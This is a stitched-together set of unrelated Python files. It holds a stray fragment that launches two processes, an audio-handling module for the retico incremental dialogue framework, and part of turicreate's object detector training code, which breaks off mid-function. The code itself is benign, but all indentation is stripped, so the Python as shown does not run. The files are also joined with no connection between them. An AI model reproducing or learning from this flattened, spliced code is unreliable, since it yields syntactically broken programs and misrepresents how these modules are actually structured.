if __name__=='__main__':
p1 = Process(target = chkDb)
p1.start()
p2 = Process(target = chkStats)
p2.start()
|
audio.py
|
"""
Audio Module
============
This module defines basic incremental units and incremental modules to handle
audio input (via a standard microphone) and output.
"""
import threading
import queue
import time
import wave
try:
import pyaudio
except ImportError:
pass
from retico_core import *
CHANNELS = 1
"""Number of channels. For now, this is hard coded MONO. If there is interest to do
stereo or audio with even more channels, it has to be integrated into the modules."""
TIMEOUT = 0.01
"""Timeout in seconds used for the StreamingSpeakerModule."""
class AudioIU(IncrementalUnit):
"""An audio incremental unit that receives raw audio data from a source.
The audio contained should be monaural.
Attributes:
creator (AbstractModule): The module that created this IU
previous_iu (IncrementalUnit): A link to the IU created before the
current one.
grounded_in (IncrementalUnit): A link to the IU this IU is based on.
created_at (float): The UNIX timestamp of the moment the IU is created.
raw_audio (bytes[]): The raw audio of this IU
rate (int): The frame rate of this IU
nframes (int): The number of frames of this IU
sample_width (int): The bytes per sample of this IU
"""
@staticmethod
def type():
return "Audio IU"
def __init__(
self,
creator=None,
iuid=0,
previous_iu=None,
grounded_in=None,
rate=None,
nframes=None,
sample_width=None,
raw_audio=None,
**kwargs
):
super().__init__(
creator=creator,
iuid=iuid,
previous_iu=previous_iu,
grounded_in=grounded_in,
payload=raw_audio,
)
self.raw_audio = raw_audio
self.rate = rate
self.nframes = nframes
self.sample_width = sample_width
def set_audio(self, raw_audio, nframes, rate, sample_width):
"""Sets the audio content of the IU."""
self.raw_audio = raw_audio
self.payload = raw_audio
self.nframes = int(nframes)
self.rate = int(rate)
self.sample_width = int(sample_width)
def audio_length(self):
"""Return the length of the audio IU in seconds.
Returns:
float: Length of the audio in this IU in seconds.
"""
return float(self.nframes) / float(self.rate)
class SpeechIU(AudioIU):
"""A type of audio incremental unit that contains a larger amount of audio
information and the information if the audio should be dispatched or not.
This IU can be processed by an AudioDispatcherModule which converts this
type of IU to AudioIU.
"""
@staticmethod
def type():
return "Speech IU"
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.disptach = False
class DispatchedAudioIU(AudioIU):
"""A type of audio incremental unit that is dispatched by an
AudioDispatcherModule. It has the information of the percentual completion
of the dispatched audio. This may be useful for a dialog manager that
wants to track the status of the current dispatched audio.
"""
@staticmethod
def type():
return "Dispatched Audio IU"
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.completion = 0.0
self.is_dispatching = False
def set_dispatching(self, completion, is_dispatching):
"""Set the completion percentage and the is_dispatching flag.
Args:
completion (float): The degree of completion of the current
utterance.
is_dispatching (bool): Whether or not the dispatcher is currently
dispatching
"""
self.completion = completion
self.is_dispatching = is_dispatching
class MicrophoneModule(AbstractProducingModule):
"""A module that produces IUs containing audio signals that are captures by
a microphone."""
@staticmethod
def name():
return "Microphone Module"
@staticmethod
def description():
return "A prodicing module that records audio from microphone."
@staticmethod
def output_iu():
return AudioIU
def callback(self, in_data, frame_count, time_info, status):
"""The callback function that gets called by pyaudio.
Args:
in_data (bytes[]): The raw audio that is coming in from the
microphone
frame_count (int): The number of frames that are stored in in_data
"""
self.audio_buffer.put(in_data)
return (in_data, pyaudio.paContinue)
def __init__(self, chunk_size, rate=44100, sample_width=2, **kwargs):
"""
Initialize the Microphone Module.
Args:
chunk_size (int): The number of frames that should be stored in one
AudioIU
rate (int): The frame rate of the recording
sample_width (int): The width of a single sample of audio in bytes.
"""
super().__init__(**kwargs)
self.chunk_size = chunk_size
self.rate = rate
self.sample_width = sample_width
self._p = pyaudio.PyAudio()
self.audio_buffer = queue.Queue()
self.stream = None
def process_update(self, update_message):
if not self.audio_buffer:
return None
sample = self.audio_buffer.get()
output_iu = self.create_iu()
output_iu.set_audio(sample, self.chunk_size, self.rate, self.sample_width)
return UpdateMessage.from_iu(output_iu, UpdateType.ADD)
def setup(self):
"""Set up the microphone for recording."""
p = self._p
self.stream = p.open(
format=p.get_format_from_width(self.sample_width),
channels=CHANNELS,
rate=self.rate,
input=True,
output=False,
stream_callback=self.callback,
frames_per_buffer=self.chunk_size,
start=False,
)
def prepare_run(self):
if self.stream:
self.stream.start_stream()
def shutdown(self):
"""Close the audio stream."""
self.stream.stop_stream()
self.stream.close()
self.stream = None
self.audio_buffer = queue.Queue()
class SpeakerModule(AbstractConsumingModule):
"""A module that consumes AudioIUs of arbitrary size and outputs them to the
speakers of the machine. When a new IU is incoming, the module blocks as
long as the current IU is being played."""
@staticmethod
def name():
return "Speaker Module"
@staticmethod
def description():
return "A consuming module that plays audio from speakers."
@staticmethod
def input_ius():
return [AudioIU]
@staticmethod
def output_iu():
return None
def __init__(self, rate=44100, sample_width=2, use_speaker="both", **kwargs):
super().__init__(**kwargs)
self.rate = rate
self.sample_width = sample_width
self.use_speaker = use_speaker
self._p = pyaudio.PyAudio()
self.stream = None
self.time = None
def process_update(self, update_message):
for iu, ut in update_message:
if ut == UpdateType.ADD:
self.stream.write(bytes(iu.raw_audio))
return None
def setup(self):
"""Set up the speaker for outputting audio"""
p = self._p
# MacOS-only code...
# TODO: Figure out if this crashes on Linux and Windows
if self.use_speaker == "left":
stream_info = pyaudio.PaMacCoreStreamInfo(channel_map=(0, -1))
elif self.use_speaker == "right":
stream_info = pyaudio.PaMacCoreStreamInfo(channel_map=(-1, 0))
else:
stream_info = pyaudio.PaMacCoreStreamInfo(channel_map=(0, 0))
self.stream = p.open(
format=p.get_format_from_width(self.sample_width),
channels=CHANNELS,
rate=self.rate,
input=False,
output_host_api_specific_stream_info=stream_info,
output=True,
)
def shutdown(self):
"""Close the audio stream."""
self.stream.stop_stream()
self.stream.close()
self.stream = None
class StreamingSpeakerModule(AbstractConsumingModule):
"""A module that consumes Audio IUs and outputs them to the speaker of the
machine. The audio output is streamed and thus the Audio IUs have to have
exactly [chunk_size] samples."""
@staticmethod
def name():
return "Streaming Speaker Module"
@staticmethod
def description():
return "A consuming module that plays audio from speakers."
@staticmethod
def input_ius():
return [AudioIU]
@staticmethod
def output_iu():
return None
def callback(self, in_data, frame_count, time_info, status):
"""The callback function that gets called by pyaudio."""
if self.audio_buffer:
try:
audio_paket = self.audio_buffer.get(timeout=TIMEOUT)
return (audio_paket, pyaudio.paContinue)
except queue.Empty:
pass
return (b"\0" * frame_count * self.sample_width, pyaudio.paContinue)
def __init__(self, chunk_size, rate=44100, sample_width=2, **kwargs):
"""Initialize the streaming speaker module.
Args:
chunk_size (int): The number of frames a buffer of the output stream
should have.
rate (int): The frame rate of the audio. Defaults to 44100.
sample_width (int): The sample width of the audio. Defaults to 2.
"""
super().__init__(**kwargs)
self.chunk_size = chunk_size
self.rate = rate
self.sample_width = sample_width
self._p = pyaudio.PyAudio()
self.audio_buffer = queue.Queue()
self.stream = None
def process_update(self, update_message):
for iu, ut in update_message:
if ut == UpdateType.ADD:
self.audio_buffer.put(iu.raw_audio)
return None
def setup(self):
"""Set up the speaker for speaking...?"""
p = self._p
self.stream = p.open(
format=p.get_format_from_width(self.sample_width),
channels=CHANNELS,
rate=self.rate,
input=False,
output=True,
stream_callback=self.callback,
frames_per_buffer=self.chunk_size,
)
def prepare_run(self):
self.stream.start_stream()
def shutdown(self):
"""Close the audio stream."""
self.stream.stop_stream()
self.stream.close()
self.stream = None
self.audio_buffer = queue.Queue()
class AudioDispatcherModule(AbstractModule):
"""An Audio module that takes a raw audio stream of arbitrary size and
outputs AudioIUs with a specific chunk size at the rate it would be produced
if the audio was being played.
This could be espacially useful when an agents' TTS module produces an
utterance, but this utterance should not be transmitted as a whole but in
an incremental way.
Attributes:
target_chunk_size (int): The size of each output IU in samples.
silence (bytes): A bytes array containing [target_chunk_size] samples
of silence that is dispatched when [continuous] is True and no input
IU is dispatched.
continuous (bool): Whether or not the dispatching should be continuous.
If True, AudioIUs with "silence" will be disptached if no input IUs
are being dispatched. If False, no IUs will be produced during
silence.
rate (int): The sample rate of the outout and the input IU.
sample_width (int): The sample with of the output and input IU.
speed (float): The speed of the dispatching. 1.0 means realtime.
dispatching_mutex (threading.Lock): The mutex if an input IU is
currently being dispatched.
audio_buffer (list): The current audio buffer containing the output IUs
that are currently dispatched.
run_loop (bool): Whether or not the dispatching loop is running.
interrupt (bool): Whether or not incoming IUs interrupt the old
dispatching
"""
@staticmethod
def name():
return "Audio Dispatching Module"
@staticmethod
def description():
return (
"A module that transmits audio by splitting it up into" "streamable pakets."
)
@staticmethod
def input_ius():
return [SpeechIU]
@staticmethod
def output_iu():
return DispatchedAudioIU
def __init__(
self,
target_chunk_size,
rate=44100,
sample_width=2,
speed=1.0,
continuous=True,
silence=None,
interrupt=True,
**kwargs
):
"""Initialize the AudioDispatcherModule with the given arguments.
Args:
target_chunk_size (int): The size of each output IU in samples.
rate (int): The sample rate of the outout and the input IU.
sample_width (int): The sample with of the output and input IU.
speed (float): The speed of the dispatching. 1.0 means realtime.
continuous (bool): Whether or not the dispatching should be
continuous. If True, AudioIUs with "silence" will be dispatched
if no input IUs are being dispatched. If False, no IUs will be
produced during silence.
silence (bytes): A bytes array containing target_chunk_size samples
of silence. If this argument is set to None, a default silence
of all zeros will be set.
interrupt (boolean): If this flag is set, a new input IU with audio
to dispatch will stop the current dispatching process. If set to
False, the "old" dispatching will be finished before the new one
is started. If the new input IU has the dispatching flag set to
False, dispatching will always be stopped.
"""
super().__init__(**kwargs)
self.target_chunk_size = target_chunk_size
if not silence:
self.silence = b"\0" * target_chunk_size * sample_width
else:
self.silence = silence
self.continuous = continuous
self.rate = rate
self.sample_width = sample_width
self._is_dispatching = False
self.dispatching_mutex = threading.Lock()
self.audio_buffer = []
self.run_loop = False
self.speed = speed
self.interrupt = interrupt
def is_dispatching(self):
"""Return whether or not the audio dispatcher is dispatching a Speech
IU.
Returns:
bool: Whether or not speech is currently dispatched
"""
with self.dispatching_mutex:
return self._is_dispatching
def set_dispatching(self, value):
"""Set the dispatching value of this module in a thread safe way.
Args:
value (bool): The new value of the dispatching flag.
"""
with self.dispatching_mutex:
self._is_dispatching = value
def process_update(self, update_message):
cur_width = self.target_chunk_size * self.sample_width
# If the AudioDispatcherModule is set to intterupt mode or if the
# incoming IU is set to not dispatch, we stop dispatching and clean the
# buffer
for iu, ut in update_message:
if ut != UpdateType.ADD:
continue
if self.interrupt or not iu.dispatch:
self.set_dispatching(False)
self.audio_buffer = []
if iu.dispatch:
# Loop over all frames (frame-sized chunks of data) in the input IU
# and add them to the buffer to be dispatched by the
# _dispatch_audio_loop
for i in range(0, iu.nframes, self.target_chunk_size):
cur_pos = i * self.sample_width
data = iu.raw_audio[cur_pos : cur_pos + cur_width]
distance = cur_width - len(data)
data += b"\0" * distance
completion = float((i + self.target_chunk_size) / iu.nframes)
if completion > 1:
completion = 1
current_iu = self.create_iu(iu)
current_iu.set_dispatching(completion, True)
current_iu.set_audio(
data, self.target_chunk_size, self.rate, self.sample_width
)
self.audio_buffer.append(current_iu)
self.set_dispatching(True)
return None
def _dispatch_audio_loop(self):
"""A method run in a thread that adds IU to the output queue."""
while self.run_loop:
with self.dispatching_mutex:
if self._is_dispatching:
if self.audio_buffer:
self.append(
UpdateMessage.from_iu(
self.audio_buffer.pop(0), UpdateType.ADD
)
)
else:
self._is_dispatching = False
if not self._is_dispatching: # no else here! bc line above
if self.continuous:
current_iu = self.create_iu(None)
current_iu.set_audio(
self.silence,
self.target_chunk_size,
self.rate,
self.sample_width,
)
current_iu.set_dispatching(0.0, False)
self.append(UpdateMessage.from_iu(current_iu, UpdateType.ADD))
time.sleep((self.target_chunk_size / self.rate) / self.speed)
def prepare_run(self):
self.run_loop = True
t = threading.Thread(target=self._dispatch_audio_loop)
t.start()
def shutdown(self):
self.run_loop = False
self.audio_buffer = []
class AudioRecorderModule(AbstractConsumingModule):
"""A Module that consumes AudioIUs and saves them as a PCM wave file to
disk."""
@staticmethod
def name():
return "Audio Recorder Module"
@staticmethod
def description():
return "A Module that saves incoming audio to disk."
@staticmethod
def input_ius():
return [AudioIU]
def __init__(self, filename, rate=44100, sample_width=2, **kwargs):
"""Initialize the audio recorder module.
Args:
filename (string): The file name where the audio should be recorded
to. The path to the file has to be created beforehand.
rate (int): The sample rate of the input and thus of the wave file.
Defaults to 44100.
sample_width (int): The width of one sample. Defaults to 2.
"""
super().__init__(**kwargs)
self.filename = filename
self.wavfile = None
self.rate = rate
self.sample_width = sample_width
def process_update(self, update_message):
for iu, ut in update_message:
if ut == UpdateType.ADD:
self.wavfile.writeframes(iu.raw_audio)
def setup(self):
self.wavfile = wave.open(self.filename, "wb")
self.wavfile.setframerate(self.rate)
self.wavfile.setnchannels(CHANNELS)
self.wavfile.setsampwidth(self.sample_width)
def shutdown(self):
self.wavfile.close()
|
object_detector.py
|
# -*- coding: utf-8 -*-
# Copyright © 2017 Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can
# be found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
"""
Class definition and utilities for the object detection toolkit.
"""
from __future__ import print_function as _
from __future__ import division as _
from __future__ import absolute_import as _
import time as _time
import itertools as _itertools
from datetime import datetime as _datetime
import six as _six
import turicreate as _tc
import numpy as _np
from threading import Thread as _Thread
from six.moves.queue import Queue as _Queue
from turicreate.toolkits._model import CustomModel as _CustomModel
import turicreate.toolkits._internal_utils as _tkutl
from turicreate.toolkits import _coreml_utils
from turicreate.toolkits._model import PythonProxy as _PythonProxy
from turicreate.toolkits._internal_utils import (_raise_error_if_not_sframe,
_numeric_param_check_range)
from turicreate import config as _tc_config
from .. import _mxnet_utils
from turicreate.toolkits._main import ToolkitError as _ToolkitError
from .. import _pre_trained_models
from ._evaluation import average_precision as _average_precision
from .._mps_utils import (use_mps as _use_mps,
mps_device_name as _mps_device_name,
MpsGraphAPI as _MpsGraphAPI,
MpsGraphNetworkType as _MpsGraphNetworkType,
MpsGraphMode as _MpsGraphMode,
mps_to_mxnet as _mps_to_mxnet,
mxnet_to_mps as _mxnet_to_mps,
mxnet_network_to_mps_params as _mxnet_network_to_mps_params)
_MXNET_MODEL_FILENAME = "mxnet_model.params"
def _get_mps_od_net(input_image_shape, batch_size, output_size, anchors,
config, weights={}):
"""
Initializes an MpsGraphAPI for object detection.
"""
network = _MpsGraphAPI(network_id=_MpsGraphNetworkType.kODGraphNet)
c_in, h_in, w_in = input_image_shape
c_out = output_size
h_out = h_in // 32
w_out = w_in // 32
c_view = c_in
h_view = h_in
w_view = w_in
network.init(batch_size, c_in, h_in, w_in, c_out, h_out, w_out,
weights=weights, config=config)
return network
# Standard lib functions would be great here, but the formatting options of
# timedelta are not great
def _seconds_as_string(seconds):
"""
Returns seconds as a human-friendly string, e.g. '1d 4h 47m 41s'
"""
TIME_UNITS = [('s', 60), ('m', 60), ('h', 24), ('d', None)]
unit_strings = []
cur = max(int(seconds), 1)
for suffix, size in TIME_UNITS:
if size is not None:
cur, rest = divmod(cur, size)
else:
rest = cur
if rest > 0:
unit_strings.insert(0, '%d%s' % (rest, suffix))
return ' '.join(unit_strings)
def _raise_error_if_not_detection_sframe(dataset, feature, annotations, require_annotations):
_raise_error_if_not_sframe(dataset, 'datset')
if feature not in dataset.column_names():
raise _ToolkitError("Feature column '%s' does not exist" % feature)
if dataset[feature].dtype != _tc.Image:
raise _ToolkitError("Feature column must contain images")
if require_annotations:
if annotations not in dataset.column_names():
raise _ToolkitError("Annotations column '%s' does not exist" % annotations)
if dataset[annotations].dtype not in [list, dict]:
raise _ToolkitError("Annotations column must be of type dict or list")
def create(dataset, annotations=None, feature=None, model='darknet-yolo',
classes=None, max_iterations=0, verbose=True, **kwargs):
"""
Create a :class:`ObjectDetector` model.
Parameters
----------
dataset : SFrame
Input data. The columns named by the ``feature`` and ``annotations``
parameters will be extracted for training the detector.
annotations : string
Name of the column containing the object detection annotations. This
column should be a list of dictionaries (or a single dictionary), with
each dictionary representing a bounding box of an object instance. Here
is an example of the annotations for a single image with two object
instances::
[{'label': 'dog',
'type': 'rectangle',
'coordinates': {'x': 223, 'y': 198,
'width': 130, 'height': 230}},
{'label': 'cat',
'type': 'rectangle',
'coordinates': {'x': 40, 'y': 73,
'width': 80, 'height': 123}}]
The value for `x` is the horizontal center of the box paired with
`width` and `y` is the vertical center of the box paired with `height`.
'None' (the default) indicates the only list column in `dataset` should
be used for the annotations.
feature : string
Name of the column containing the input images. 'None' (the default)
indicates the only image column in `dataset` should be used as the
feature.
model : string optional
Object detection model to use:
- "darknet-yolo" : Fast and medium-sized model
classes : list optional
List of strings containing the names of the classes of objects.
Inferred from the data if not provided.
max_iterations : int
The number of training iterations. If 0, then it will be automatically
be determined based on the amount of data you provide.
verbose : bool, optional
If True, print progress updates and model details.
Returns
-------
out : ObjectDetector
A trained :class:`ObjectDetector` model.
See Also
--------
ObjectDetector
Examples
--------
.. sourcecode:: python
# Train an object detector model
>>> model = turicreate.object_detector.create(data)
# Make predictions on the training set and as column to the SFrame
>>> data['predictions'] = model.predict(data)
# Visualize predictions by generating a new column of marked up images
>>> data['image_pred'] = turicreate.object_detector.util.draw_bounding_boxes(data['image'], data['predictions'])
"""
_raise_error_if_not_sframe(dataset, "dataset")
from ._mx_detector import YOLOLoss as _YOLOLoss
from ._model import tiny_darknet as _tiny_darknet
from ._sframe_loader import SFrameDetectionIter as _SFrameDetectionIter
from ._manual_scheduler import ManualScheduler as _ManualScheduler
import mxnet as _mx
if len(dataset) == 0:
raise _ToolkitError('Unable to train on empty dataset')
_numeric_param_check_range('max_iterations', max_iterations, 0, _six.MAXSIZE)
start_time = _time.time()
supported_detectors = ['darknet-yolo']
if feature is None:
feature = _tkutl._find_only_image_column(dataset)
if verbose:
print("Using '%s' as feature column" % feature)
if annotations is None:
annotations = _tkutl._find_only_column_of_type(dataset,
target_type=[list, dict],
type_name='list',
col_name='annotations')
if verbose:
print("Using '%s' as annotations column" % annotations)
_raise_error_if_not_detection_sframe(dataset, feature, annotations,
require_annotations=True)
is_annotations_list = dataset[annotations].dtype == list
_tkutl._check_categorical_option_type('model', model,
supported_detectors)
base_model = model.split('-', 1)[0]
ref_model = _pre_trained_models.OBJECT_DETECTION_BASE_MODELS[base_model]()
params = {
'anchors': [
(1.0, 2.0), (1.0, 1.0), (2.0, 1.0),
(2.0, 4.0), (2.0, 2.0), (4.0, 2.0),
(4.0, 8.0), (4.0, 4.0), (8.0, 4.0),
(8.0, 16.0), (8.0, 8.0), (16.0, 8.0),
(16.0, 32.0), (16.0, 16.0), (32.0, 16.0),
],
'grid_shape': [13, 13],
'batch_size': 32,
'aug_resize': 0,
'aug_rand_crop': 0.9,
'aug_rand_pad': 0.9,
'aug_rand_gray': 0.0,
'aug_aspect_ratio': 1.25,
'aug_hue': 0.05,
'aug_brightness': 0.05,
'aug_saturation': 0.05,
'aug_contrast': 0.05,
'aug_horizontal_flip': True,
'aug_min_object_covered': 0,
'aug_min_eject_coverage': 0.5,
'aug_area_range': (.15, 2),
'aug_pca_noise': 0.0,
'aug_max_attempts': 20,
'aug_inter_method': 2,
'lmb_coord_xy': 10.0,
'lmb_coord_wh': 10.0,
'lmb_obj': 100.0,
'lmb_noobj': 5.0,
'lmb_class': 2.0,
'non_maximum_suppression_threshold': 0.45,
'rescore': True,
'clip_gradients': 0.025,
'weight_decay': 0.0005,
'sgd_momentum': 0.9,
'learning_rate': 1.0e-3,
'shuffle': True,
'mps_loss_mult': 8,
# This large buffer size (8 batches) is an attempt to mitigate against
# the SFrame shuffle operation that can occur after each epoch.
'io_thread_buffer_size': 8,
}
if '_advanced_parameters' in kwargs:
# Make sure no additional parameters are provided
new_keys = set(kwargs['_advanced_parameters'].keys())
set_keys = set(params.keys())
unsupported = new_keys - set_keys
if unsupported:
raise _ToolkitError('Unknown advanced parameters: {}'.format(unsupported))
params.update(kwargs['_advanced_parameters'])
anchors = params['anchors']
num_anchors = len(anchors)
num_mxnet_gpus = _mxnet_utils.get_num_gpus_in_use(max_devices=params['batch_size'])
batch_size_each = params['batch_size'] // max(num_mxnet_gpus, 1)
# Note, this may slightly alter the batch size to fit evenly on the GPUs
batch_size = max(num_mxnet_gpus, 1) * batch_size_each
use_mps = _use_mps() and num_mxnet_gpus == 0
# The IO thread also handles MXNet-powered data augmentation. This seems
# to be problematic to run independently of a MXNet-powered neural network
# in a separate thread. For this reason, we restrict IO threads to when
# the neural network backend is MPS.
io_thread_buffer_size = params['io_thread_buffer_size'] if use_mps else 0
if verbose:
if use_mps:
print('Using GPU to create model ({})'.format(_mps_device_name()))
elif num_mxnet_gpus == 1:
print('Using GPU to create model (CUDA)')
elif num_mxnet_gpus > 1:
print('Using {} GPUs to create model (CUDA)'.format(num_mxnet_gpus))
else:
print('Using CPU to create model')
grid_shape = params['grid_shape']
input_image_shape = (3,
grid_shape[0] * ref_model.spatial_reduction,
grid_shape[1] * ref_model.spatial_reduction)
try:
if is_annotations_list:
instances = (dataset.stack(annotations, new_column_name='_bbox', drop_na=True)
.unpack('_bbox', limit=['label']))
else:
instances = dataset.rename({annotations: '_bbox'}).dropna('_bbox')
instances = instances.unpack('_bbox', limit=['label'])
except (TypeError, RuntimeError):
# If this fails, the annotation format isinvalid at the coarsest level
raise _ToolkitError("Annotations format is invalid. Must be a list of "
"dictionaries or single dictionary containing 'label' and 'coordinates'.")
num_images = len(dataset)
num_instances = len(instances)
if classes is None:
classes = instances['_bbox.label'].unique()
classes = sorted(classes)
# Make a class-to-index look-up table
class_to_index = {name: index for index, name in enumerate(classes)}
num_classes = len(classes)
if max_iterations == 0:
# Set number of iterations through a heuristic
num_iterations_raw = 5000 * _np.sqrt(num_instances) / batch_size
num_iterations = 1000 * max(1, int(round(num_iterations_raw / 1000)))
if verbose:
print("Setting 'max_iterations' to {}".format(num_iterations))
else:
num_iterations = max_iterations
# Create data loader
loader = _SFrameDetectionIter(dataset,
batch_size=batch_size,
input_shape=input_image_shape[1:],
output_shape=grid_shape,
anchors=anchors,
class_to_index=class_to_index,
aug_params=params,
shuffle=params['shuffle'],
loader_type='augmented',
feature_column=feature,
annotations_column=annotations,
io_thread_buffer_size=io_thread_buffer_size,
iterations=num_iterations)
# Predictions per anchor box: x/y + w/h + object confidence + class probs
preds_per_box = 5 + num_classes
output_size = preds_per_box * num_anchors
ymap_shape = (batch_size_each,) + tuple(grid_shape) + (num_anchors, preds_per_box)
net = _tiny_darknet(output_size=output_size)
loss = _YOLOLoss(input_shape=input_image_shape[1:],
output_shape=grid_shape,
batch_size=batch_size_each,
num_classes=num_classes,
anchors=anchors,
parameters=params)
base_lr = params['learning_rate']
steps = [num_iterations // 2, 3 * num_iterations // 4, num_iterations]
steps_and_factors = [(step, 10**(-i)) for i, step in enumerate(steps)]
steps, factors = zip(*steps_and_factors)
lr_scheduler = _ManualScheduler(step=steps, factor=factors)
ctx = _mxnet_utils.get_mxnet_context(max_devices=batch_size)
net_params = net.collect_params()
net_params.initialize(_mx.init.Xavier(), ctx=ctx)
net_params['conv7_weight'].initialize(_mx.init.Xavier(factor_type='avg'), ctx=ctx, force_reinit=True)
net_params['conv8_weight'].initialize(_mx.init.Uniform(0.00005), ctx=ctx, force_reinit=True)
# Initialize object confidence low, preventing an unnecessary adjustment
# period toward conservative estimates
bias = _np.zeros(output_size, dtype=_np.float32)
bias[4::preds_per_box] -= 6
from ._mx_detector import ConstantArray
net_params['conv8_bias'].initialize(ConstantArray(bias), ctx, force_reinit=True)
# Take a subset and then load the rest of the parameters. It is possible to
# do allow_missing=True directly on net_params. However, this will more
# easily hide bugs caused by names getting out of sync.
ref_model.available_parameters_subset(net_params).load(ref_model.model_path, ctx)
if verbose:
# Print progress table header
column_names = ['Iteration', 'Loss', 'Elapsed Time']
num_columns = len(column_names)
column_width = max(map(lambda x: len(x), column_names)) + 2
hr = '+' + '+'.join(['-' * column_width] * num_columns) + '+'
print(hr)
print(('| {:<{width}}' * num_columns + '|').format(*column_names, width=column_width-1))
print(hr)
progress = {'smoothed_loss': None, 'last_time': 0}
iteration = 0
def update_progress(cur_loss, iteration):
iteration_base1 = iteration + 1
if progress['smoothed_loss'] is None:
progress['smoothed_loss'] = cur_loss
else:
progress['smoothed_loss'] = 0.9 * progress['smoothed_loss'] + 0.1 * cur_loss
cur_time = _time.time()
if verbose and (cur_time > progress['last_time'] + 10 or
iteration_base1 == max_iterations):
# Print progress table row
elapsed_time = cur_time - start_time
print("| {cur_iter:<{width}}| {loss:<{width}.3f}| {time:<{width}.1f}|".format(
cur_iter=iteration_base1, loss=progress['smoothed_loss'],
time=elapsed_time , width=column_width-1))
progress['last_time'] = cur_time
if use_mps:
net.forward(_mx.nd.uniform(0, 1, (batch_size_each,) + input_image_shape))
mps_net_params = {}
keys = list(net_params)
for k in keys:
mps_net_params[k] = _mxnet_to_mps(net_params[k].data().asnumpy())
# Multiplies the loss to move the fp16 gradients away from subnormals
# and gradual underflow. The learning rate is correspondingly divided
# by the same multiple to make training mathematically equivalent. The
# update is done in fp32, which is why this trick works. Does not
# affect how loss is presented to the user.
mps_loss_mult = params['mps_loss_mult']
mps_config = {
'mode': _MpsGraphMode.Train,
'use_sgd': True,
'learning_rate': base_lr / params['mps_loss_mult'],
'gradient_clipping': params.get('clip_gradients', 0.0) * mps_loss_mult,
'weight_decay': params['weight_decay'],
'od_include_network': True,
'od_include_loss': True,
'od_scale_xy': params['lmb_coord_xy'] * mps_loss_mult,
'od_scale_wh': params['lmb_coord_wh'] * mps_loss_mult,
'od_scale_no_object': params['lmb_noobj'] * mps_loss_mult,
'od_scale_object': params['lmb_obj'] * mps_loss_mult,
'od_scale_class': params['lmb_class'] * mps_loss_mult,
'od_max_iou_for_no_object': 0.3,
'od_min_iou_for_object': 0.7,
'od_rescore': params['rescore'],
}
mps_net = _get_mps_od_net(input_image_shape=input_image_shape,
batch_size=batch_size,
output_size=output_size,
anchors=anchors,
config=mps_config,
weights=mps_net_params)
# Use worker threads to isolate different points of synchronization
# and/or waiting for non-Python tasks to finish. The
# sframe_worker_thread will spend most of its time waiting for SFrame
# operations, largely image I/O and decoding, along with scheduling
# MXNet data augmentation. The numpy_worker_thread will spend most of
# its time waiting for MXNet data augmentation to complete, along with
# copying the results into NumPy arrays. Finally, the main thread will
# spend most of its time copying NumPy data into MPS and waiting for the
# results. Note that using three threads here only makes sense because
# each thread spends time waiting for non-Python code to finish (so that
# no thread hogs the global interpreter lock).
mxnet_batch_queue = _Queue(1)
numpy_batch_queue = _Queue(1)
def sframe_worker():
# Once a batch is loaded into NumPy, pass it immediately to the
# numpy_worker so that we can start I/O and decoding for the next
# batch.
for batch in loader:
mxnet_batch_queue.put(batch)
mxnet_batch_queue.put(None)
def numpy_worker():
while True:
batch = mxnet_batch_queue.get()
if batch is None:
break
for x, y in zip(batch.data, batch.label):
# Convert to NumPy arrays with required shapes. Note that
# asnumpy waits for any pending MXNet operations to finish.
input_data = _mxnet_to_mps(x.asnumpy())
label_data = y.asnumpy().reshape(y.shape[:-2] + (-1,))
# Convert to packed 32-bit arrays.
input_data = input_data.astype(_np.float32)
if not input_data.flags.c_contiguous:
input_data = input_data.copy()
label_data = label_data.astype(_np.float32)
if not label_data.flags.c_contiguous:
label_data = label_data.copy()
# Push this batch to the main thread.
numpy_batch_queue.put({'input' : input_data,
'label' : label_data,
'iteration' : batch.iteration})
# Tell the main thread there's no more data.
numpy_batch_queue.put(None)
sframe_worker_thread = _Thread(target=sframe_worker)
sframe_worker_thread.start()
numpy_worker_thread = _Thread(target=numpy_worker)
numpy_worker_thread.start()
batches_started = 0
batches_finished = 0
while True:
batch = numpy_batch_queue.get()
if batch is None:
break
# Adjust learning rate according to our schedule.
if batch['iteration'] in steps:
ii = steps.index(batch['iteration']) + 1
new_lr = factors[ii] * base_lr
mps_net.set_learning_rate(new_lr / mps_loss_mult)
# Submit this match to MPS.
mps_net.start_batch(batch['input'], label=batch['label'])
batches_started += 1
# If we have two batches in flight, wait for the first one.
if batches_started - batches_finished > 1:
batches_finished += 1
cur_loss = mps_net.wait_for_batch().sum() / mps_loss_mult
# If we just submitted the first batch of an iteration, update
# progress for the iteration completed by the last batch we just
# waited for.
if batch['iteration'] > iteration:
update_progress(cur_loss, iteration)
iteration = batch['iteration']
# Wait for any pending batches and finalize our progress updates.
while batches_finished < batches_started:
batches_finished += 1
cur_loss = mps_net.wait_for_batch().sum() / mps_loss_mult
update_progress(cur_loss, iteration)
sframe_worker_thread.join()
numpy_worker_thread.join()
# Load back into mxnet
mps_net_params = mps_net.export()
keys = mps_net_params.keys()
for k in keys:
if k in net_params:
net_params[k].set_data(_mps_to_mxnet(mps_net_params[k]))
else: # Use MxNet
options = {'learning_rate': base_lr, 'lr_scheduler': lr_scheduler,
'momentum': params['sgd_momentum'], 'wd': params['weight_decay'], 'rescale_grad': 1.0}
clip_grad = params.get('clip_gradients')
if clip_grad:
options['clip_gradient'] = clip_grad
trainer = _mx.gluon.Trainer(net.collect_params(), 'sgd', options)
for batch in loader:
data = _mx.gluon.utils.split_and_load(batch.data[0], ctx_list=ctx, batch_axis=0)
label = _mx.gluon.utils.split_and_load(batch.label[0], ctx_list=ctx, batch_axis=0)
Ls = []
Zs = []
with _mx.autograd.record():
for x, y in zip(data, label):
z = net(x)
z0 = _mx.nd.transpose(z, [0, 2, 3, 1]).reshape(ymap_shape)
L = loss(z0, y)
Ls.append(L)
for L in Ls:
L.backward()
trainer.step(1)
cur_loss = _np.mean([L.asnumpy()[0] for L in Ls])
update_progress(cur_loss, batch.iteration)
iteration = batch.iteration
training_time = _time.time() - start_time
if verbose:
print(hr) # progress table footer
# Save the model
training_iterations = iteration + 1
state = {
'_model': net,
'_class_to_index': class_to_index,
'_training_time_as_string': _seconds_as_string(training_time),
'_grid_shape': grid_shape,
'anchors': anchors,
'model': model,
'classes': classes,
'batch_size': batch_size,
'input_image_shape': input_image_shape,
'feature': feature,
